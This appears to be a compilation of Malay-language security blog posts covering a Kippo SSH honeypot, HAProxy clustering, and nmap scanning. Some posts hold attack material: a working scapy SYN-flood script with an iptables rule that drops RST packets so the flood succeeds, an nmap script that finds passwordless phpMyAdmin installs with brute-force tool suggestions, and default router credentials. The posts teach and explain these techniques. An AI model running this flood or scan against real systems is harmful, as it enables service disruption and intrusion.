Happy h4ckin dari pokcik gh1mau

Ok, mari kita tengok apa itu HoneyPot
“In computer terminology, a honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. Generally it consists of a computer, data, or a network site that appears to be part of a network, but is actually isolated and monitored, and which seems to contain information or a resource of value to attackers.“
Sumber : http://en.wikipedia.org/wiki/Honeypot_(computing)

Jadi kita dapat paham, honeyPot adalah satu ‘sistem’ yang disetkan sebagai perangkap untuk mengundang para attackers agar attack sistem tersebut.

Apa tujuannya?
1. Untuk tujuan pengumpulan data(statistik dan pattern).
2. Untuk mempelajari teknik baru yang digunakan oleh attacker.
3. Dan macam-macam lagi la

Cuba kita nengok diagram architechture honeyPot kat bawah ni.

Caption : Architecture Kippo HoneyPot

By default port Kippo adalah 2222, so kita perlu buat portforwarding dari port 22(standard ssh port) kepada port 2222. Dan kita perlukan satu lagi port pada server ni, untuk tujuan management. Attacker dari luar akan melihat port 22 ini dibuka, dan mereka akan cuba untuk ‘masuk’. Dalam kes ini, kita setkan kippo server berada pada DMZ Zone.

Attacker akan membuat port scan terhadap server ini dan mendapati port 22(ssh) dibuka. Dan attacker akan mulakan aktiviti ‘nger00t’ hehehe.

Architecture Kippo HoneyPot

Ok, sekarang ni kita tengok macam mana nak setup kippo HoneyPot ni. Aku gunakan Ubuntu Server. Pertama sekali login dalam ubuntu server korang dan jalankan command berikut :

sudo mkdir /opt/kippo
sudo apt-get install subversion
sudo apt-get install mysql-server
sudo apt-get install python-dev openssl python-openssl python-pyasn1 python-twisted python mysql-db

cd /opt/kippo/
sudo svn checkout http://kippo.googlecode.com/svn/trunk/

Kemudian kita setkan user baru dengan nama kippo(atau apa-apa nama). (kita taknak run honeyPot ni sebagai user root).

Kita buat sikit konfigurasi pada mysql server. Korang leh gunakan command kat bawah ni.

mysql -u root -p
mysql>CREATE DATABASE kippo;
GRANT ALL ON kippo.* to 'kippo'@'localhost' identified by 'katalaluan';
exit

cd /opt/kippo/doc/sql
mysql -u kippo -p kippo < mysql.sql
exit

Anda perlu mengubah konfigurasi pada fail kippo.cfg. Masukkan nama database, katanama, katalaluan.
Kemudian korang kena setkan pada iptables untuk tujuan port forward.

sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 2222

Kita boleh mula runkan kippo honeyPot ni dengan command berikut :

su kippo
bash
/opt/kippo/start.sh

Kat bawah ni ada script yang aku buat untuk tujuan paparan data yang diperolehi dari kippo

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="refresh" content="300;url=main.php">
<title>SSH HoneyPot Viewer by Hussein b. Mohamed a.k.a gh1mau</title>
<style type="text/css">
body,td,th {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
body {
background-image: url(DSCRT-15-7.jpg);
background-repeat: repeat;
}

.tbl_header {
color: #FFF;
}
#left-table, #right-table {
float:left;
}
#left-table {
margin-right:1px;
}
#new-table {
float:inherit
}

</style>
</head>

<body>
<?php
//setting untuk connection dengan db kippo
$host = "localhost";
$user = "root"; //username
$pass = ""; //password
$db_name = "kippo"; //nama database

$link = mysql_connect($host, $user, $pass);
mysql_select_db($db_name);

//query utk 10 most common username
$sqlusername = "select count(username), username from auth where username <> '' group by
username order by count(username) desc limit 10";
$resultusername = mysql_query ($sqlusername);

//query utk 10 most common password
$sqlpassword = "select count(password), password from auth where password <> '' group by
password order by count(password) desc limit 10";
$resultpassword = mysql_query ($sqlpassword);

//query utk success ratio
$sqlsuccess = "select count(success), success from auth group by success order by success";
$resultsuccess = mysql_query ($sqlsuccess);

//query utk 10 unique ip
$sqlip = "select count(ip), ip from sessions group by ip order by count(ip) desc limit 10";
$resultip = mysql_query ($sqlip);

?>
<h3><strong><u>SSH HoneyPot Viewer</u></strong></h3>
<p>
<?php
//paparkan data dalam table - username
echo '<table width="25%" id="left-table">
<td colspan="2" align="center" bgcolor="#990000"><strong><font color=white>Top 10 most common              username attempted   </font></strong></td>
<tr>
<td align="center" bgcolor="#990000"><font color = white><b>count(username)</b></font></td>
<td align="center" bgcolor="#990000"><font color = white><b>username</b></font></td>
</tr>';

//dapatkan data menggunkan gelung while
$bg = '#0066FF';
while ($rowusername = mysql_fetch_array($resultusername, MYSQL_ASSOC)){
$bg = ($bg == '#FFFF99' ? '#FF8888' : '#FFFF99');
echo '<tr  bgcolor="' . $bg . '">
<td align="center"><strong>' . $rowusername['count(username)'] . '</strong></td>
<td align="left"><strong>' . $rowusername['username'] . '</strong></td>
</tr>';

}

echo '</table>';
mysql_free_result($resultusername);

//paparkan data dalam table - password
echo '<table width="25%" id="right-table">
<td colspan="2" align="center" bgcolor="#990000"><strong><font color=white>Top 10 most common              password attempted   </font></strong></td>
<tr>
<td align="center" bgcolor="#990000"><font color = white><b>count(password)</b></font></td>
<td align="center" bgcolor="#990000"><font color = white><b>password</b></font></td>
</tr>';

//dapatkan data menggunkan gelung while
$bg = '#0066FF';
while ($rowpassword = mysql_fetch_array($resultpassword, MYSQL_ASSOC)){
$bg = ($bg == '#FFFF99' ? '#FF8888' : '#FFFF99');
echo '<tr  bgcolor="' . $bg . '">
<td align="center"><strong>' . $rowpassword['count(password)'] . '</strong></td>
<td align="left"><strong>' . $rowpassword['password'] . '</strong></td>
</tr>';

}

echo '</table>';
mysql_free_result($resultpassword);

//paparkan data dalam table - success ratio
echo '<table width="25%" id="right-table">
<td colspan="2" align="center" bgcolor="#990000"><strong><font color=white>Top 10 unique IP     connections </font></strong></td>
<tr>
<td align="center" bgcolor="#990000"><font color = white><b>count(ip)</b></font></td>
<td align="center" bgcolor="#990000"><font color = white><b>ip</b></font></td>

</tr>';

//dapatkan data menggunkan gelung while
$bg = '#0066FF';
while ($rowip = mysql_fetch_array($resultip, MYSQL_ASSOC)){
$bg = ($bg == '#FFFF99' ? '#FF8888' : '#FFFF99');
echo '<tr  bgcolor="' . $bg . '">
<td align="center"><strong>' . $rowip['count(ip)'] . '</strong></td>
<td align="left"><strong>' . $rowip['ip'] . '</strong></td>
</tr>';

}

echo '</table>';
mysql_free_result($resultip);

//paparkan data dalam table - unique ip
echo '<table width="25%" id="right-table">
<td colspan="2" align="center" bgcolor="#990000"><strong><font color=white>Success Ratio     </font></strong></td>
<tr>
<td align="center" bgcolor="#990000"><font color = white><b>count(success)</b></font></td>
<td align="center" bgcolor="#990000"><font color = white><b>success</b></font></td>

</tr>';

//dapatkan data menggunkan gelung while
$bg = '#0066FF';
while ($rowsuccess = mysql_fetch_array($resultsuccess, MYSQL_ASSOC)){
$bg = ($bg == '#FFFF99' ? '#FF8888' : '#FFFF99');
echo '<tr  bgcolor="' . $bg . '">
<td align="center"><strong>' . $rowsuccess['count(success)'] . '</strong></td>
<td align="left"><strong>' . $rowsuccess['success'] . '</strong></td>
</tr>';

}

echo '</table>';
mysql_free_result($resultsuccess);
mysql_close();
?>
<p>

<table width="100%" border="0" id="right-table">
<tr><td>&nbsp;</td></tr>
<tr><td>by Hussein b. Mohamed a.k.a gh1mau Version 1.0.0</td></tr>
</table>
</body>
</html>

Caption : Kippo HoneyPot viewer

Dan jenguk-jenguk la folder /opt/kippo/log/tty. Kat sana kita leh nengok apa yang attacker buat lepas dapat ‘masuk’ ke dalam server ni.

Gunakan utilities playlog.py (dlm folder /opt/kippo/utils). Macam-macam ada.. heheheh
Nanti insya ALLAH aku update log-log menarik yang berjaya di’tangkap’

p/s : Posting pasal rsync untuk tujuan web apache auto mirror tu aku hold dulu. Nanti ada masa aku buat la posting pasal tu

Happy h4ckin dari pokcik gh1mau

Cuba lihat logical diagram dibawah. Apabila klien mengakses web, klien akan menggunakan ip loadbalancer:10.55.32.47, dan loadbalancer akan menghantar request kepada web01.

Caption: Architecture Apache Web Clustering

Sekiranya web01 down, secara automatik, loadbalancer akan menghantar request klien kepada web02. Macam tu lah cara ianya berfungsi. Kalau kedua dua web server down, tak leh nak buat apa la Kena tambah lah backup server yang ketiga

Caption: Architecture Apache Web Clustering

Sekarang ni, kita akan bincangkan konfigurasi yang terlibat.
Bagi server web01 dan web02, kita perlu install package apache. Gunakan command seperti dibawah:

sudo apt-get update
sudo apt-get install apache2

Buat satu file pada webroot directory, file ini akan digunakan oleh haproxy untuk tujuan memastikan status server web01 dan web02 sama ada up atau down.

sudo touch /var/www/haproxytest.txt

Caption: Loadbalancer akan membuat request fail haproxytest.txt terhadap web01 dan web02 untuk mendapatkan status kedua web server ini.

Ok, sekarang ni kita akan mula setup haproxy pula. Pada server ubuntu yang lagi satu (10.55.32.47) Kita runkan command berikut :

sudo apt-get install haproxy

Kemudian kita ubah fail configuration fail haproxy(/etc/haproxy/haproxy.cfg) ini dengan configuration seperti dibawah:

global
          maxconn 4096
          user haproxy
          group haproxy
          daemon

defaults
          log     global
          mode    http
          option  httplog
          option  dontlognull
          retries 3
          option  redispatch
          maxconn 2000
          contimeout      5000
          clitimeout      50000
          srvtimeout      50000

listen webcluster 10.55.32.47:80
          mode    http
          stats   enable
          stats   auth kambing:kambing123
          balance roundrobin
          option httpchk HEAD /haproxytest.txt HTTP/1.0
          option forwardfor
          cookie biskut_gh1mau insert
          option httpclose
          server web01 10.55.32.52:80 cookie biskut_gh1mau_web01 check
          server web02 10.55.32.52:80 cookie biskut_gh1mau_web02 check

Dan kita perlu enable kan haproxy. Setkan ENABLED=1 pada fail /etc/default/haproxy. Kemudian startkan service haproxy dengan command dibawah :

sudo /etc/init.d/haproxy start

Kita boleh mengakses status page haproxy ni dengan url seperti berikut : (alamat ip adalah mengikut alamat ip anda)

http://10.55.32.47/haproxy?stats

Bila klien akses web page, klien akan diberikan satu cookie, by default cookie adalah merujuk pada web01. Cookie ini akan digunakan oleh haproxy untuk menghantar request client pada server yang berkenaan.

Caption: Klien diberikan cookie yang merujuk kepada server web01

Apabila server web01 down, kita dapat melihat perkara ini pada haproxy status page. Klien masih boleh mengakses web page lagi kerana web02 masih up.

Dan kita dapat lihat cookie pada klien sudah berubah.

Caption: Klien diberikan cookie yang merujuk kepada server web02

Ok, tamatlah berkenaan dengan apache webclustering. Kalau di tanya apa tujuan clustreing ni, jawapan mudahnya adalah untuk tujuan high availability.

Ini merupakan konfigurasi yang asas. Ada beberapa masalah dalam konfigurasi ini :

1. Kalau kita lihat content dalam web01 dan web02 boleh jadi tak sama sekiranya hanya web01 diupdate, kita akan gunakan rsync untuk tujuan sync content.
2. Sekiranya loadbalancer/haproxy down, maka server web (web01 dan web02) tidak dapat diakses. Untuk tujuan ini kita perlukan 2 server loadbalancer/haproxy dengan konfigurasi heartbeat.
3. Konfigurasi apache logfile

Insya ALLAH aku akan cuba kongsikan teknik-teknik tersebut dalam posting akan datang.

Happy ha4kin dari pokcik gh1mau

So, skrip tu aku dah upgrade sikit, dan nak kongsi dengan korang. Tanpa membuang masa (hehehe), berikut adalah structure skrip tersebut.Aku namakan skrip ni sebagai http-phpmyadmin-detect.nse

Caption: http-phpmyadmin-detect.nse structure

Macam mana skrip ni bekerja? Ok, kita nengok diagram kat bawah ni untuk dapatkan gambaran asas bagaimana fungsi dan workflow skrip ni.

Caption: fungsi skrip http-phpmyadmin-detect.nse

Caption: Flow perjalanan skrip. (Bahagaimana skrip ini bekerja)

Berikut adalah skrip http-phpmyadmin-detect.nse

description = [[
Skrip untuk mengesan aplikasi phpMyAdmin, berdasarkan senarai folder.
Sekiranya phpMyAdmin yang diuji membenarkan fungsi AllowNoPassword,
skrip ini akan memaparkan result : Page phpMyAdmin tidak mempunyai katalaluan.
Sekiranya aplikasi phpMyAdmin menggunakan katalaluan, skrip ini akan
memaparkan result : Page phpMyAdmin mempunyai katalaluan"

Anda boleh membuat password guessing atau menggunakan tools lain untuk proses
bruteforcing. (cadangan tools : thc-hydra, brutus, burp-suite)

Skrip ini dibangunkan untuk tujuan pembelajaran sahaja. Sebarang penyalahgunaan skrip
ini adalah atas tanggungjawab pengguna sendiri

ghimau82[at]yahoo.com
]]

author = "Hussein bin Mohamed a.k.a gh1mau | http://gh1mau.wordpress.com "
license = "Same as nmap -- see http://nmap.org/book/man-legal.htm"
categories = {"discovery", "intrusive"}

require 'shortport'
require 'http'
require 'stdnse'

--function untuk semak sekiranya response code adalah 200:ditemui
local validate = function(response)
   if not response.status then
     return nil
   end

   if response.status ~= 200 then
     return nil
   end

   if response.status == 200 then
     return response.status
   end

return nil
end

--function untuk output
local output = function(hasil1, hasil2, host, dir)
   local out = ""
      out = out .. "[phpMyAdmin Detection]\n[+] Direktori : ".. dir .."\n"
      out = out .. "[+] Url : http://".. stdnse.get_hostname(host) .."".. dir .."\n"
      out = out .. "[+] Page Title : ".. hasil1 .."\n"
      out = out .. "[+] phpMyAdmin : " .. hasil2 .."\n"
   return out
end

portrule = shortport.port_or_service({80, 443}, {"http", "https"})

action = function(host, port)

--senarai directory phpmyadmin (anda boleh menambah lagi senarai anda sendiri)
local dirs = {
   '/ayam/',
   '/PMA/',
   '/pma/',
   '/admin/',
   '/dbadmin/',
   '/mysql/',
   '/myadmin/',
   '/sqlmanager/',
   '/mysqlmanager/',
   '/PMA2005/',
   '/pma2005/',
   '/phpmyadmin/',
   '/phpmanager/',
   '/php-myadmin/',
   '/phpmy-admin/',
   '/webadmin/',
   '/sqlweb/',
   '/websql/',
   '/webdb/',
   '/mysqladmin/',
   '/mysql-admin/',
}

for _, dir in ipairs(dirs) do
   local response = http.generic_request(host, port, "GET", dir.."main.php")
      result1 = response.body
      result2 = response.body

      local w = ""
      local w = string.match(result2, "Server version: [%w.-]+")

   if not string.match(result1, "phpMyAdmin") then
      result3 = "BUKAN PHPMYADMIN"
   else

   if validate(response) then
      title = string.match(result1, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")
      result1 = string.gsub(title , "[\n\r\t]", "")

   if w == nil then
      result2 = "Page phpMyAdmin mempunyai katalaluan"
   end

   if string.match(w, "Server version:") then
      result2 = "Page phpMyAdmin tidak mempunyai katalaluan"
   end

   return output(result1,result2, host, dir)
end
end
end
end

Baiklah, kita cuba runkan skrip dan dan buat analisa ringkas. Korang boleh runkan script dengan dengan command berikut :

nmap alamat_target -p80 -PN –script http-phpmyadmin-detect.nse

Kita dapat lihat, script ini akan memaparkan beberapa maklumat berkenaan dengan aplikasi phpmyadmin yang diuji.

Caption: Skrip http-phpmyadmin-detect.nse in action

Walaupun server mempunyai satu folder dengan nama ayam; dan didalam senarai array direktori phpmyadmin mempunyai nama ayam, tetapi script ini tidak memaparkan output bagi folder tersebut, kerana ianya bukan aplikasi phpmyadmin. (Ujian terhadap aplikasi phpmyadmin adalah berdasarkan title page aplikasi tersebut).

Kita runkan wireshark dan kita dapat lihat request yang dilakukan oleh skrip ini.
Gunakan filter http.request.method == “GET” untuk melihat request yang dilakukan oleh skrip.

Kita gunakan filter : http.response.code == 200 untuk melihat request yang berjaya. Dari sini kita lihat ada 2 request yang berjaya dengan http status code 200. Line 33 adalah folder ayam (ini kerana nama folder ini ada dalam list array skrip ini). Line 225 adalah folder phpmyadmin yang sebenar.

Ni adalah hasil scanning aku pada range server kat tempat aku. Hehehe.. Korang leh la try. Insya Allah untuk version akan datang, aku plan nak tambah function untuk guess password atau password bruteforcing.

Caption: w00t! Hehehe

Ok lah untuk kali ni. Insya Allah entri akan datang, aku nak kongsi teknik clustering menggunakan ubuntu.

Happy h4ckin dari pokcik gh1mau

Mesti korang biasa dengan term DOS Attack. DOS Attack adalah satu jenis serangan terhadap service atau server tu sendiri dengan tujuan agar server tu down dan tak boleh di akses oleh client yang lain.

SYN Flood atau disebut juga SYN queue flood adalah salah satu dari DOS attack. (Kalau banyak attacker yang attack disebutlah DDOS:Distributed Denial of Service Attack)

Ok, kita tengok dulu normal tcp connection. Connection antara 2 client akan melalui proses 3-Way handshake.rasanya tak perlu nak explain kot.

TCP 3 Way Handshake

Ok, kita tengok capture wireshark kat bawah. Source address pertama adalah client yang cuba akses website google. Kita akan nampak berlakunya TCP 3 way handshake ni. Setelah selesai, baru requesting dan transfering of data berlaku.

TCP 3 Way Handshake dilihat dari wireshark capture

Sekarang ni kita lihat, bagaimana SYN Flood ni beroperasi.

Proses SYN Flooding pada Target Server

Attacker akan hantar packet SYN kepada server. Dan seperti biasa server akan reply balik packet SYN|ACK kepada attacker. Sepatutnya Attacker perlu reply balik dengan packet ACK kepada server, tetapi Attacker tidak menghantar packet tersebut. Dan server akan tunggu reply packet ACK dari Attacker.

Dan ini yang dinamakan “half open”. Server akan “menyimpan” connection ini dalam Backlog Queue(Sebab server bagi masa kepada client:Attacker untuk reply balik packet ACK supaya dapat teruskan sesi).Setelah selang masa tertentu, Queue ini akan dibuang dari server.

Attacker pula akan menghantar lebih banyak packet SYN kepada server sebelum server sempat membuang connections tadi dari Backlog Queue(Dan Attacker tetap tidak reply dengan packet ACK kepada server), dan hasilnya, Queue ini akan overflow.

Bila perkara ini terjadi, server sudah tidak boleh menerima connection yang lain lagi.

Ok, enough of theories, let’s do practical Hehehe

Sekarang ni senario dia macam ni, kita ada 2 Attacker dan 1 Target. Attacker 1 akan melakukan port svan terhadap target untuk mengetahui port mana yang dibuka.

Scan target dengan nmap untuk lihat service mana yang open

Dari result nmap, kita dapati port 80 dibuka. So kita akan flood port 80 tu. Kita akan buat syn flood menggunakan script kat bawah ni.

#! /usr/bin/env python
# Syn Flood For Testing Purpose
# Hussein b. Mohamed a.k.a gh1mau

import sys,random
from scapy.all import *
if len(sys.argv) != 3:
print "Usage: %s <Alamat IP> <Port>" % sys.argv[0]
sys.exit(1)

alamat_target = sys.argv[1]
port_target = int(sys.argv[2])

#source_random = RandIP("0.0.0.0/0")
print "Maklumat Packet Yang Dihantar"
info=IP(dst=alamat_target,ttl=128)/TCP(sport=RandShort(),dport=port_target,flags="S")
ls(info)

print "SYN Flooding bermula"
ans,unans=srloop(info,inter=0.3,retry=2,timeout=4)

print "Ringkasan packet yang dihantar"
ans.summary()
unans.summary()
print "source port flag:"
ans.make_table(lambda(s,r): (s.dst, s.dport, r.sprintf("%IP.id% \t %IP.ttl% \t %TCP.flags%")))

Untuk runkan script ni, perlu ada python dan scapy library. Script ni akan buat connection pada target, dari random port. Kita setkan ttl value 128, so target akan ingat kita ni adalah windows machine. Kalau perasan, ada line #source_random = RandIP(“0.0.0.0/0″) pada script ni. Kita leh uncomment dan script ni akan hantar packet dari random ip

Bila kita analisa capture dari Attacker 1(fail:cap_1), kita dapati, Attacker 1 menghantar packet SYN, dan Target reply balik dengan packet SYN|ACK.

Akan tetapi, Attacker juga menghantar kepada target packet packet RST. Kita perlu halang perkara ini supaya SYN Flood kita berjaya.

Gunakan filter tcp.flags.reset : untuk melihat RST packet

Kita tambah command iptables berikut pada Attacker, dengan tujuan agar iptable ini akan DROP packet RST. (Bila target menerima packet RST dari Attacker, half open tidak berlaku, dan SYN Flood attack akan gagal)

sudo iptables -A OUTPUT -p tcp -s 10.55.32.28 –tcp-flags RST RST -j DROP

Bila kira runkan kembali script syn_flood kita, dan kita buat packet capture, kita dapati Attacker 1 sudah tidak menghantar RST packet lagi kepada target. Ini kerana iptables yang kita setkan tadi, telah berjaya DROP RST Packet dari Attacker 1 kepada Target.

Packet RST sudah tidak dihantar lagi oleh Attacker 1

Pada Attacker 2, kita jalankan juga script syn_flood.py, dan pastikan setting iptables dibuat agar packet RST dari Attacker 2 di DROP. Nantikan sehingga target down . Sekiranya Attacker menghantar packet RST(atau apa-apa packet lain setelah target reply dengan SYN|ACK, Target akan menganggap connection tersebut berjaya : full tcp connections, so SYN Flood ini akan gagal.

Pada target server, kita boleh jalan command berikut untuk melihat berapa banyak connections.

netstat | grep “www” | grep -iv “ESTABLISHED” | wc -l

Happy h4ckin dari pokcik gh1mau

Pada default configuration, router ni enable telnet(port 23) dan http(port 80) servis untuk tujuan management. Untuk akses pada router ni aku gunakan default username dan password bagi router ni,  iaitu :

user : manager
pass : friend

Kalau router ni masih dalam keadaan default config, senang citer tak ubah password dan username dia la kan, kita leh akses router dengan credentials kat atas tu

Akses console router dengan telnet. Macam-macam boleh buat

Akses web interface untuk router ni. Kita boleh nengok configuration file. Pada bahagaian ni yang menarik adalah snmp string. Biasanya string yang sama digunakan untuk tujuan deployment oleh vendor yang sama atau di environment yang sama

Happy h4ckin dari pokcik gh1mau

Ok, entri kali ni, aku nak citer skit pasal SYN Scan :

TCP SYN Scan

Teknik ni biasanya disebut juga sebagai half open scanning, sebab kita tak melakukan connection TCP yang penuh. So kat sini kita manipulate connection TCP dengan tujuan asalnya nak evade dari IDS supaya aktiviti scanning kita tak dikesan. Tapi realitinya sekarang ni, hampir kesemua IDS dah boleh kesan dan alert terhadap teknik scanning ni

Ok, secara teknikalnya, TCP SYN scan ni bekerja macam ni : Attacker akan hantar packet SYN kepada mangsa, lepas tu mangsa pulak akan reply dengan packet SYN|ACK, dari sini attacker dah tahu yang port tersebut buka. So bila attacker dah dapat maklumat, attacker terus hantar RST packet untuk putuskan connection dengan mangsa.

Teknik TCP SYN Scan

Dalam nmap command yang kita gunakan simple jer untuk SYN Scan ni :

nmap -sS ip_target

Cuba kite nengok wireshark capture yang aku buat masa proses nmap syn scan ni.

Capture menunjukkan attacker menghantar packet SYN kepada target.

Capture menunjukkan target reply balik dengan packet SYN|ACK kepada attacker

Capture menunjukkan attacker menghantar packet RST kepada target

Amacam, paham tak? Huhuhu.. kita sewajarnya kena paham betul-betul konsep bagi teknik-teknik ‘hacking’ yang kita gunakan. So kita tak lah semata-mata gunakan tools secara buta tuli tanpa tahu apa sebenarnya yang berlaku. Setuju tak?

Ha.. dan lagi satu, kat bawah ni filter yang aku gunakan dalam wireshark untuk cari spesific packet dalam capture kat atas tu.

Happy Hackin dari pokcik gh1mau

tcp.flags.syn (ni untuk packet dengan flag SYN)
tcp.flags&18 (ni untuk flag SYN(16) dan ACK(2))
tcp.flags.reset (ni untuk packet dengan flag RST)

Insya Allah aku akan cuba update sekerap yang termampu kat blog ni. Macam biasalah, main content dalam blog ni would be on Computer Security.

Insya Allah esok, aku akan handle (Jadi tenaga pengajar) untuk satu kursus security di Cyberjaya. Kepada siapa yang berminat untuk buat custom training, atau dapatkan maklumat kursus berkaitan dengan ICT Security, System Developtment, ICT Forensics, Networking boleh lah contact aku yer

Syllabus bagi Kursus Pentration testing for CERT Agencies

Di bawah merupakan satu skrip nmap (nse) yang digunakan untuk detect sekiranya ada folder phpmyadmin. Dalam kursus ni aku akan kongsi cara asas membuat nmap script.

 description = [[
Skrip asas untuk mengesan aplikasi phpmyadmin
]]

author = "Hussein bin Mohamed a.k.a ghimau"
license = "Same as nmap -- see http://nmap.org/book/man-legal.htm"
categories = {"default", "discovery", "safe"}

require "shortport"
require "http"

portrule = shortport.port_or_service({80, 443}, {"http", "https"})

action = function(host, port)
local stat = http.generic_request(host, port, "GET", '/phpmyadmin/')

-- semak sekiranya status http code = 200
  if stat.status == 200 then
     return "w00t! Phpmyadmin ditemui! :-)"
  else
     return "d4mn! Tiada phpmyadmin! :-("
  end
end
 

Struktur asas nmap nse(nmap scripting engine) adalah seperti dalam rajah dibawah. (nse menggunakan bahasa programming yang di panggil “lua”)

Struktur atau architechture bagi nmap script (nse)

Script ni boleh di extend :

• tambah array/filelist untuk senarai folder phpmyadmin
• tambah function untuk basic password guessing

Nantikan update terbaru blog aku ni, insya Allah, aku akan kongsi teknik nmap scanning.

Happy h4cking dari pokcik gh1mau